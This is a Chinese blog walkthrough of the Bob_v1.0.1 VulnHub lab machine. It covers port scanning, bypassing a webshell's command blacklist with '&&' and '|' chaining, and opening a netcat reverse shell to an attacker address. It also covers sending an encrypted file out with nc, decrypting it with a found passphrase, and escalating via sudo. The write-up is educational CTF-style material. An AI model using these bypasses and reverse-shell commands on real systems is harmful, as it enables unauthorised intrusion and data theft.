Bob_v1.0.1渗透实战

作者: 城市烈人 | 来源:发表于2019-01-31 21:02 被阅读0次

Bob_v1.0.1渗透实战
《Web渗透技术及实战案例解析.pdf》PDF高清完整版-免费下
渗透实战：内网域渗透
MERCY渗透实战
Sedna渗透实战
RootThis渗透实战
eric渗透实战
SolidState渗透实战
HackInOS渗透实战
WebDeveloper 渗透实战

Bob_v1.0.1渗透实战

该靶机有意思的是如何绕过webshell命令执行，进而反弹shell后；在靶机中信息收集，提权，get flag！！！

信息收集

nmap -sS -Pn -A -p- -n 192.168.8.143

a

开放的端口和服务：

80/tcp    open  http
25468/tcp open  ssh

访问http://192.168.8.143/robots.txt，得到以下目录：

a

/login.php
/dev_shell.php
/lat_memo.html
/passwords.html

http://192.168.8.143/login.php访问不到

http://192.168.8.143//lat_memo.html用户Bob提示说有个webshell，想必就是dev_shell.php

a
http://192.168.8.143/passwords.html有提示说：已将密码文件移出了服务器

a
右键下源码：

a
直接看下webshell：http://192.168.8.143/dev_shell.php

a
是一个命令执行框，很多命令被禁了，whoami是可以用的

右键下源码：

a

dir爆目录

中途出现宕机，更换下靶机IP为：192.168.8.144

找到一处目录：http://192.168.8.144/news.html

a
右键查看源码中发现了：

SW4gb3RoZXIgbmV3cyBzb21lIGR1bWJhc3MgbWFkZSBhIGZpbGUgY2FsbGVkIHBhc3N3b3Jkcy5odG1sLCBjb21wbGV0ZWx5IGJyYWluZGVhZA0KDQotQm9i

a

拿去base64解码得：

In other news some dumbass made a file called passwords.html, completely braindead
-Bob

a
然而这正是之前的目录http://192.168.8.143/passwords.html

绕过限制getshell

http://192.168.8.143/dev_shell.php

然而很多命令都被禁了

这里可以用ls的升级版命令lsattr，发现当前目录下存在dev_shell.php.bak备份文件，直接down下来，审计源码

a
查看源码发现黑名单写死了"pwd", "ls", "netcat", "ssh", "wget", "ping", "traceroute", "cat", "nc"

a
此外还发现了禁止执行带有";"的命令

a
绕过技巧有：

1、并列绕过（&&）

既然能够执行whoami命令，与其他命令用&&并列执行绕过

whoami&&nc 192.168.8.253 4444 -e /bin/sh

2、或绕过（ | ）

whoami | nc 192.168.8.253 4444 -e /bin/sh

3、bin/ 可执行文件来执行绕过

/bin/nc 192.168.8.253 4444 -e /bin/sh

在kali上开启nc监听，等待反弹：

nc -lvp 4444

反弹成功

a

用python切一下bash

python -c 'import pty;pty.spawn("/bin/bash")'

提权

进入root目录没有权限，先进入home目录下，查看当前的所有用户信息

a
发现了这些用户，bob elliot jc seb,而靶机提示的用户正是bob

在bob目录的Documents文件夹下发现了Secret login.txt.gpg staff.txt

a
发现login.txt.gpg是一个加密的 txt 文件，并没有权限使用gpg -d login.txt.gpg 去解码

查看下staff.txt，貌似没啥用

继续进入Secret -> Keep_Out ->Not_Porn ->No_Lookie_In_Here 发现了notes.sh

#!/bin/bash
clear
echo "-= Notes =-"
echo "Harry Potter is my faviorite"
echo "Are you the real me?"
echo "Right, I'm ordering pizza this is going nowhere"
echo "People just don't get me"
echo "Ohhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh <sea santy here>"
echo "Cucumber"
echo "Rest now your eyes are sleepy"
echo "Are you gonna stop reading this yet?"
echo "Time to fix the server"
echo "Everyone is annoying"
echo "Sticky notes gotta buy em"

这大概是一首藏头诗，首个大写字母

密码“HARPOCRATES”

接下来有两种方法：

方法一：

我们拿到藏头诗的密码后，推测HARPOCRATES应该会是之前login.txt.gpg的密码，但本地禁用gpg -d login.txt.gpg解密

用nc传文件到kali本机进行解码

kali接收端：

nc -lvp 4445 > login.txt.gpg

靶机发送端：

nc -w 3 192.168.8.253 4445 < login.txt.gpg

收到之后，在kali进行解密

gpg --batch --passphrase HARPOCRATES -d login.txt.gpg

a

解密后得到账号、密码

bob:b0bcat_

直接su bob

a
在 / 目录下发现了flag文件，但cat读不到

用sudo --list查看下可执行的命令，列出用户特权

sudo cat flag.txt

拿到flag

a

方法二：

查看另一个用户elliot

a

发现了elliot已经将密码改为theadminisdumb

直接登录25468端口的ssh

ssh -p 25468 elliot@192.168.8.147

a

到了这一步，还是得去用得到的密码解login.txt.gpg后，登录bob，再getflag

总结

本次靶机渗透实战，虽然web渗透不多，但是一旦进入shell中，进行信息收集或者提权的时候，要熟练掌握nc反弹，nc传文件和一些sudo常用命令等

Bob_v1.0.1靶机下载地址：
https://download.vulnhub.com/bob/Bob_v1.0.1.ova

网友评论

本文标题：Bob_v1.0.1渗透实战

本文链接：https://www.haomeiwen.com/subject/jgmlsqtx.html

延伸阅读

深度阅读

您也可以注册成为美文阅读网的作者，发表您的原创作品、分享您的心情！

Bob_v1.0.1渗透实战

Bob_v1.0.1渗透实战

信息收集

dir爆目录

绕过限制getshell

1、并列绕过（&&）

2、或绕过（ | ）

3、bin/ 可执行文件来执行绕过

提权

方法一：

方法二：

总结

相关文章